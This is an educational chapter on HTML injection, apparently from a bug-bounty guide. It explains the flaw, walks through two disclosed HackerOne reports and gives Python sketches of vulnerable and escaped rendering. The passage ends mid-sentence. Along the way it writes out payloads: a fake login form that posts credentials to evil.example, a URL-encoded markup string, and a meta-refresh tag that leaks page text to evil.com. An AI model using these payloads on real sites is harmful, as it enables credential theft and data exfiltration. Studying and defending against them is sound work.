HTML Injection

Hypertext Markup Language (HTML) injection is also sometimes referred to as virtual defacement. It is an attack made possible when a site lets a malicious user inject HTML into its web page(s) because it doesn’t handle that user’s input properly. In other words, an HTML injection vulnerability arises when a site receives HTML, typically via some form input, and then renders it as is on the page. This is separate and distinct from injecting JavaScript, VBScript, etc.

Since HTML is the language used to define the structure of a web page, an attacker who can inject HTML can essentially change what a browser renders. Sometimes this could result in completely changing the look of a page; in other cases, it could mean creating forms to trick users. For example, if you could inject HTML, you might be able to add a <form> tag to the page asking the user to re-enter their username and password. When the user submits this form, however, it actually sends the information to an attacker.
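As a minimal sketch of the idea above, the Python below contrasts two hypothetical renderers for a user-supplied profile bio: one inserts the input as is, the other escapes it first with the standard library’s html.escape. The function names, the bio field and the evil.example collection URL are illustrative assumptions, not taken from any real site.

```python
from html import escape

# Hypothetical attacker input: a fake "session expired" login form whose
# action points at a server the attacker controls (placeholder domain).
INJECTED_BIO = (
    '<form action="https://evil.example/collect" method="post">'
    'Session expired. Username: <input name="user"> '
    'Password: <input type="password" name="pass">'
    '<input type="submit" value="Log in"></form>'
)


def render_bio_unsafe(bio: str) -> str:
    """Vulnerable: the user's input is placed into the page as is."""
    return f'<div class="bio">{bio}</div>'


def render_bio_safe(bio: str) -> str:
    """Escapes &, <, > and quotes so the browser shows the input as text."""
    return f'<div class="bio">{escape(bio)}</div>'


if __name__ == "__main__":
    # The unsafe version hands the browser a live <form> element...
    print(render_bio_unsafe(INJECTED_BIO))
    # ...while the safe version turns it into inert text (&lt;form ...).
    print(render_bio_safe(INJECTED_BIO))
```

Escaping at the point where user text enters the page is what keeps the browser from treating it as markup.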

Examples

1. Coinbase Comments
Difficulty: Low
Url: coinbase.com/apps
Report Link: https://hackerone.com/reports/104543
Date Reported: December 10, 2015
Bounty Paid: $200
Description:
For this vulnerability, the reporter identified that Coinbase was actually decoding URI-encoded values when rendering text. For those unfamiliar (as I was at the time of writing this), characters in a URI are either reserved or unreserved. According to Wikipedia, reserved characters are those that sometimes have a special meaning, like / and &. Unreserved characters are those without any special meaning, typically just letters and digits.

So, when a character is URI encoded, it is converted into its byte value in the American Standard Code for Information Interchange (ASCII), written as two hexadecimal digits and preceded by a percent sign (%). So, / becomes %2F and & becomes %26. As an aside, ASCII is a character encoding that was the most common on the internet until another encoding, UTF-8, came along. Now, back to our example: if an attacker entered HTML like:

<h1>This is a test</h1>

Coinbase would actually render that as plain text, exactly as you see above. However, if the user submitted URL encoded characters, like:

%3C%68%31%3E%54%68%69%73%20%69%73%20%61%20%74%65%73%74%3C%2F%68%31%3E
Coinbase would actually decode that string and render the resulting HTML, displaying a heading that reads:

This is a test
With this, the reporting hacker demonstrated how he could submit an HTML form with username and password fields, which Coinbase would render. Had the hacker been malicious, Coinbase could have rendered a form which submitted values back to a malicious website to capture credentials (assuming people filled out and submitted the form).
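The report doesn’t say how Coinbase’s rendering code was written, so the following is only a hypothetical Python sketch of one way this class of bug can arise: if text is HTML-escaped first and URI-decoded afterwards, the escaping step never sees the < and > characters hidden inside %3C and %3E. The helper names are made up for this example; percent_encode_all reproduces the encoded payload shown above by encoding every byte, letters included.

```python
from html import escape
from urllib.parse import unquote


def percent_encode_all(text: str) -> str:
    """Percent-encode every ASCII byte of text, including unreserved letters."""
    return "".join(f"%{byte:02X}" for byte in text.encode("ascii"))


def render_comment_unsafe(comment: str) -> str:
    """Hypothetical flawed pipeline: escape first, then URI-decode.

    The still-encoded input contains no '<' or '>', so escape() changes
    nothing and unquote() then produces live markup.
    """
    return unquote(escape(comment))


def render_comment_safe(comment: str) -> str:
    """Decode first, then escape, so decoded markup is shown as text."""
    return escape(unquote(comment))


payload = percent_encode_all("<h1>This is a test</h1>")
print(payload)                          # matches the encoded string above
print(render_comment_unsafe(payload))   # <h1>This is a test</h1>
print(render_comment_safe(payload))     # &lt;h1&gt;This is a test&lt;/h1&gt;

# Plain HTML is still escaped by the flawed pipeline, which is why the
# unencoded payload appeared as harmless text.
print(render_comment_unsafe("<h1>This is a test</h1>"))
```

Decoding before escaping, or not decoding user text at render time at all, avoids this particular ordering problem.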

2. HackerOne Unintended HTML Inclusion
Difficulty: Medium
Url: hackerone.com
Report Link: https://hackerone.com/reports/112935
Date Reported: January 26, 2016
Bounty Paid: $500
Description:
After reading about the Yahoo! XSS (example 4 in Chapter 7), I became obsessed with testing HTML rendering in text editors. This included playing with HackerOne’s Markdown editor, entering things like ismap= "yyy=xxx" and "'test" inside of image tags. While doing so, I noticed that the editor would include a single quote within a double quote, which is known as a hanging quote.

At that time, I didn’t really understand the implications of this. I knew that if you injected another single quote somewhere, a browser could parse the two together and treat all of the content between them as a single attribute value. For example:

<h1>This is a test</h1><p class="some class">some content</p>'

With this example, if you managed to inject a meta tag like:

<meta http-equiv="refresh" content='0; url=https://evil.com/log.php?text=

the browser would follow the refresh and send everything between the two single quotes to evil.com in the text parameter. As it turns out, this was already known and had been disclosed in HackerOne report #110578 by intidc (https://hackerone.com/intidc). When that became public, my heart sank a little.
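To see why the hanging quote matters, here is a small Python sketch that feeds the injected meta tag, followed by the page content from the earlier example and the hanging quote, to the standard library’s html.parser.HTMLParser. It assumes a > happens to follow the hanging quote so that the tag closes; the class and variable names are illustrative. Python’s parser is not a browser, but it applies the same basic rule: a single-quoted attribute value runs until the next single quote.

```python
from html.parser import HTMLParser

# The injected tag opens a single-quoted content attribute...
INJECTED_META = (
    '<meta http-equiv="refresh" '
    "content='0; url=https://evil.com/log.php?text="
)
# ...the legitimate page content follows...
PAGE_CONTENT = '<h1>This is a test</h1><p class="some class">some content</p>'
# ...and the hanging quote closes the attribute (assumes a '>' follows it).
HANGING_QUOTE = "'>"


class RefreshCollector(HTMLParser):
    """Records the target URL of every <meta http-equiv="refresh"> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.refresh_urls: list[str] = []

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)
        if tag == "meta" and (attributes.get("http-equiv") or "").lower() == "refresh":
            content = attributes.get("content") or ""
            # content looks like "0; url=<target>"; keep only the target.
            self.refresh_urls.append(content.partition("url=")[2])


parser = RefreshCollector()
parser.feed(INJECTED_META + PAGE_CONTENT + HANGING_QUOTE)
parser.close()

refresh_url = parser.refresh_urls[0]
leaked_text = refresh_url.partition("text=")[2]
print(refresh_url)
print(leaked_text)  # the page content, swallowed into the attribute value
```

The whole page fragment ends up inside one attribute value, which is exactly what would be sent along to the attacker’s log.php.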

According to HackerOne, they rely on an implementation of Redcarpet (a Ruby library for Markdown processing) to escape the HTML output of any Markdown input, which is then passed directly into the HTML DOM (i.e., the web page) via dangerouslySetInnerHTML in their React component. As an aside, React is a JavaScript library that can be used to dynamically update a web page’s content without reloading the page.

The DOM (Document Object Model) is an application programming interface (API) for valid HTML and well-formed XML documents. Essentially, according to Wikipedia, the DOM is a cross-platform and language-independent convention for representing and interacting with objects in HTML, XHTML and XML documents.
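The write-up doesn’t show HackerOne’s actual escaping code, so as a stand-in the Python sketch below uses the standard library’s html.escape to illustrate why escaping output before handing it to the DOM must cover quotes, not just < and >. The img_tag helper, the cat.png source and the single-quoted alt attribute are hypothetical; the input is a string starting with a single quote, like the 'test input described earlier.

```python
from html import escape


def img_tag(alt: str, *, escape_quotes: bool) -> str:
    """Hypothetical renderer that places user text in a single-quoted attribute."""
    return f"<img src='cat.png' alt='{escape(alt, quote=escape_quotes)}'>"


user_input = "'test"

# quote=False escapes only &, < and >, so the user's single quote survives,
# closes the alt attribute early and leaves an unmatched (hanging) quote.
print(img_tag(user_input, escape_quotes=False))  # <img src='cat.png' alt=''test'>

# quote=True also escapes " and ', so the quote becomes inert text.
print(img_tag(user_input, escape_quotes=True))   # <img src='cat.png' alt='&#x27;test'>
```

A stray quote that survives escaping is harmless on its own, but it can pair with a later injected quote, as in the meta refresh example.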

In HackerOne’s implementation, they weren’t properly escaping the HTML output, which led to the potential exploit. That said, having seen the disclosure, I thought I’d test the new code, so I went back and tried adding: